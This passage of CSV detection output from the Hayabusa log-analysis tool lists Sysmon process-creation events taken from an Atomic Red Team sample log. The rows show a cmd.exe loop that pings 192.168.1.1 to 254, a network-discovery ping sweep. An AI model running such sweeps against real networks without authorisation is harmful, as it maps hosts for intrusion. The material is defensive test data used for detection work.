""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.13 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.14 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.15 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.16 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.17 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.18 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.19 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.20 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:45.011 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.21 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.22 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.23 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.24 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.25 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.26 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.27 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.28 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.29 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.30 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.31 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.32 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.33 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:51.520 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.34 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.35 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.36 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.37 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.38 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.39 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.40 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.41 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.42 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.43 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.44 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.45 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.46 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:58.020 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.47 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.48 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.49 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.50 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.51 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.52 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.53 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.54 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.55 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.56 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.57 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.58 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.59 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:04.522 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.60 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.61 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.62 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.63 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.64 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.65 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.66 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.67 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 